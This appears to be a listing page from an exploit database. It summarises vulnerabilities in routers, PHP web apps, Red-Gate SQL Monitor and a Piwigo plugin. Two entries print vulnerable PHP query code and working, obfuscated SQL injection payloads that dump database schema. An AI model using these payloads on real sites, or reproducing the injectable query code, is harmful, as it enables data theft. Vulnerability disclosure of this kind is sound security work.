header-logo
Suggest Exploit
explore-vulnerabilities

Explore Vulnerabilities

Version
Year

Explore all Exploits:

AirMaster 3000M multiple Vulnerabilities

This exploit allows an attacker to bypass authentication and execute arbitrary commands on the AirMaster 3000M router. The exploit uses a special cookie to bypass authentication and then uses a command injection vulnerability to execute arbitrary commands.

RealTime RWR-3G-100 Router Cross-Site Request Forgery (Change Admin Password)

This exploit allows an attacker to change the admin password of RealTime RWR-3G-100 Router by sending a malicious request to the router. The malicious request is sent using a form with the username and password fields. The form is submitted to the router's IP address with the action set to 'goform/formPasswordSetup'. The attacker can then set the new password to whatever they want.

De-Tutor – Private Tutoring and Admission Processing 1.0 – SQL Injection

The vulnerability allows an attacker to inject sql commands.... Vulnerable Source: $id = $_GET["id"]; $statement = $connection->query("SELECT * FROM post WHERE id='$id'"); Proof of Concept: http://localhost/[PATH]/blog-details.php?id=[SQL] -1'+/*!22222UnIoN*/(/*!22222SeLeCT*/+0x283129,0x283229,0x3c7370616e3e496873616e2053656e63616e3c2f7370616e3e,(select(@x)from(select(@x:=0x00),(@running_number:=0),(@tbl:=0x00),(select(0)from(information_schema.columns)where(table_schema=database())and(0x00)in(@x:=Concat(@x,0x3c62723e,if((@tbl!=table_name),/*!11111Concat*/(0x3c2f6469763e,LPAD(@running_number:=@running_number%2b1,2,0x30),0x3a292020,0x3c666f6e7420636f6c6f723d7265643e,@tbl:=table_name,0x3c2f666f6e743e,0x3c62723e,(@z:=0x00),0x3c646976207374796c653d226d617267696e2d6c6566743a333070783b223e), 0x00),lpad(@z:=@z%2b1,2,0x30),0x3a292020,0x3c666f6e7420636f6c6f723d626c75653e,column_name,0x3c2f666f6e743e))))x),0x283529,0x283629)--+-

De-Workshop – Auto Workshop Portal 1.0 – SQL Injection

The vulnerability allows an technician users to inject sql commands. Vulnerable Source: $customer = getCustomer($_GET['id']); ?> $ddaa = $pdo->query("SELECT * FROM vehicle WHERE customer='".$_GET['id']."' order by id desc"); Proof of Concept: http://localhost/[PATH]/vehicleadd.php?id=[SQL] -2'++UNION(SELECT+0x283129,(select(@x)from(select(@x:=0x00),(@running_number:=0),(@tbl:=0x00),(select(0)from(information_schema.columns)where(table_schema=database())and(0x00)in(@x:=Concat(@x,0x3c62723e,if((@tbl!=table_name),/*!11111Concat*/(0x3c2f6469763e,LPAD(@running_number:=@running_number%2b1,2,0x30),0x3a292020,0x3c666f6e7420636f6c6f723d7265643e,@tbl:=table_name,0x3c2f666f6e743e,0x3c62723e,(@z:=0x00),0x3c646976207374796c653d226d617267696e2d6c6566743a333070783b223e), 0x00),lpad(@z:=@z%2b1,2,0x30),0x3a292020,0x3c666f6e7420636f6c6f723d626c75653e,column_name,0x3c2f666f6e743e))))x),0x283329,0x283429,0x283529,0x283629,0x283729,0x283829,0x283929,0x28313029,0x28313129)--+- http://localhost/[PATH]/customerpage.php?id=[SQL] http://localhost/[PATH]/fileadd.php?id=[SQL] http://localhost/[PATH]/email.php?id=[SQL] Etc...

Red-Gate SQL Monitor authentication bypass

A remote attacker can gain unauthenticated access to the Base Monitor, resulting in the ability to execute arbitrary SQL commands on any monitored Microsoft SQL Server machines. If the Base Monitor is connecting to these machines using an account with SQL admin privileges, then code execution on the operating system can result in full system compromise (if Microsoft SQL Server is running with local administrator privileges).

Piwigo plugin User Tag , Persistent XSS

This vulnerability allows an attacker to inject malicious JavaScript code into the User Tag plugin of Piwigo. This code is stored in the server's database and is executed every time a visitor visits the photo page. The code is also executed in the admin's dashboard when they visit the keyword page.

Recent Exploits: